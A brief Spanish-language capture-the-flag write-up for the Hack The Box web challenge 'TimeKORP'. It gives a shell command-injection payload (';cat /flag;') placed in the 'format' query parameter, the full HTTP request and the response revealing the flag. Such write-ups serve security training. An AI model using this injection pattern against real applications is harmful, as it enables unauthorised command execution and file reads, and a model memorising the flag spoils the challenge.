TimeKORP

Challenge Description

Are you ready to unravel the mysteries and expose the truth hidden within Korp’s digital domain? Join the challenge and prove your prowess in the world of cybersecurity. Remember, time is money, but in this case, the rewards may be far greater than you imagine.

Categoria: Web
Dificultad: Muy Fácil

Solution

Un reto sencillo donde nos dan solo la url de la aplicacion. Probando diferentes cosas llegamos al siguiente payload para obtener la flag.

';cat /flag;'

Ingresando el payload nos da la flag.

GET /?format=';cat%20/flag;' HTTP/1.1
Host: 94.237.55.155:34487
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i

       <h1 class="jumbotron-heading">><span class='text-muted'>It's</span> HTB{1t_i5_t1m3_f0r_ult1m4t3_pwn4g3!}sh: 1: : Permission denied<span class='text-muted'>.</span>